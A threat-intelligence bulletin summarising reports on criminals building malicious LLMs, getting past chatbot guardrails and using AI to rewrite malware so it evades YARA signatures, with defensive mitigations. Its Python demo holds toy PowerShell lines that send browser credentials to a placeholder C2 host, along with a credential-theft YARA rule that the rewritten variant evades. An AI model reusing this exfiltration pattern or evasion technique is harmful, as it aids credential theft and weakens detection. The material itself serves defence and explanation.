Hackers Developing Malicious LLMs After WormGPT Falls Flat

Summary:
Researchers have observed growing interest among cybercriminals in developing their own malicious large language models, driven by the shortcomings of existing tools such as WormGPT. Etay Maor, senior director of security strategy at Cato Networks, highlighted discussions among hackers in underground forums that revolve around ways to get past the guardrails implemented by AI-powered chatbots. For instance, Maor pointed to a case on Telegram in which a Russian-speaking threat actor named Poena was actively recruiting AI and machine learning experts to collaborate on developing malicious LLM products.

This growing interest in custom malicious LLMs is not limited to a specific group of cybercriminals; ransomware and malware operators are also drawn to the trend. The surge in demand for AI talent is largely a reaction to disappointment with the custom tools already advertised in underground markets, which failed to deliver the functionality threat actors wanted.

A report published by Recorded Future on March 19 delves deeper into how threat actors are leveraging generative AI to craft malware and exploits. The report identifies four primary malicious use cases for AI, including using LLMs to rewrite malware source code so that it evades string-based detections such as YARA rules. As a practical example, the researchers altered SteelHook, a PowerShell infostealer used by APT28, by prompting an LLM to modify its source code so that the resulting variant bypassed a simple YARA rule while retaining its functionality.
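
To illustrate why this kind of rewrite defeats string-based signatures, below is a minimal, defender-side sketch assuming the yara-python package. The rule, string names, and PowerShell snippets are invented for the example and are not taken from SteelHook or the Recorded Future report.

```python
# Minimal sketch: a simple string-based YARA rule matches the original
# snippet but not a superficially rewritten variant with the same behavior.
# Requires the yara-python package (pip install yara-python).
import yara

# Hypothetical rule keyed to literal strings in a script's source code.
RULE = r"""
rule demo_stealer_strings
{
    strings:
        $a = "Invoke-WebRequest" nocase
        $b = "$browserCreds"
    condition:
        all of them
}
"""

# Invented toy snippets standing in for an infostealer's source code.
ORIGINAL = b'$browserCreds = Get-Content $path; Invoke-WebRequest -Uri $c2 -Body $browserCreds'
# Same behavior after a superficial rewrite (renamed variable, aliased cmdlet).
REWRITTEN = b'$bc = Get-Content $path; iwr -Uri $c2 -Body $bc'

rules = yara.compile(source=RULE)
for label, sample in (("original", ORIGINAL), ("rewritten", REWRITTEN)):
    matches = rules.match(data=sample)
    print(label, "->", [m.rule for m in matches] or "no match")
```

Running this prints a rule hit for the original snippet and "no match" for the rewritten one, which is the class of evasion the report demonstrates at source-code scale.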

Security Officer Comments:
Recorded Future also sheds light on the potential use of multimodal AI by advanced nation-state actors, who could sort through vast amounts of intelligence data to identify vulnerabilities in critical systems such as industrial control systems (ICS). However, the report notes that access to the required high-powered computing resources remains a significant barrier for lower-tier threat actors, largely limiting their use of AI to activities such as crafting phishing emails.

Suggested Corrections:
Researchers at Recorded Future recommend the following mitigations to counter malicious uses of AI, including AI-generated polymorphic malware strains:

  • Executives’ voices and likenesses are now part of an organization’s attack surface, and organizations need to assess the risk of impersonation in targeted attacks. Large payments and sensitive operations should require verification through multiple channels beyond conference calls and VoIP, such as encrypted messaging or email.
  • Organizations, particularly in the media and public sector, should track instances of their branding or content being used to conduct influence operations.
  • Organizations should invest in multi-layered and behavioral malware detection capabilities in case threat actors succeed in developing AI-assisted polymorphic malware; a minimal sketch of the layered approach follows this list. Sigma, Snort, and complex YARA rules will almost certainly remain reliable indicators of malware activity for the foreseeable future.
  • Publicly accessible images and videos of sensitive equipment and facilities should be scrutinized and scrubbed, particularly for critical infrastructure and sensitive sectors such as defense, government, energy, manufacturing, and transportation.
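
As a rough illustration of the multi-layered idea above, the sketch below combines a static signature hit with simple behavioral indicators, so that a rewritten sample that evades the static rule can still trip an alert. The field names, weights, and threshold are illustrative assumptions, not part of Recorded Future's guidance.

```python
# Minimal sketch of multi-layered detection: no single signal decides;
# several weak indicators (static match, process behavior, network behavior)
# are combined into a score. All values here are illustrative.
from dataclasses import dataclass

@dataclass
class Event:
    static_yara_hit: bool              # did any static rule fire on the file?
    spawned_encoded_powershell: bool   # e.g. powershell.exe -EncodedCommand
    beaconing_interval_sec: float      # 0 if no periodic outbound traffic seen

def score(event: Event) -> int:
    """Sum weak indicators; behavioral signals still fire even if the
    static signature was evaded by a rewritten sample."""
    s = 0
    s += 2 if event.static_yara_hit else 0
    s += 3 if event.spawned_encoded_powershell else 0
    s += 2 if 0 < event.beaconing_interval_sec <= 120 else 0
    return s

# A rewritten sample that evades the static rule but keeps its behavior
# still crosses an illustrative alerting threshold of 4.
evaded = Event(static_yara_hit=False, spawned_encoded_powershell=True,
               beaconing_interval_sec=60.0)
print(score(evaded), score(evaded) >= 4)
```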

Link(s):
https://www.databreachtoday.com/hackers-developing-malicious-llms-after-wormgpt-falls-flat-a-24724

https://www.recordedfuture.com/adversarial-intelligence-red-teaming-malicious-use-cases-ai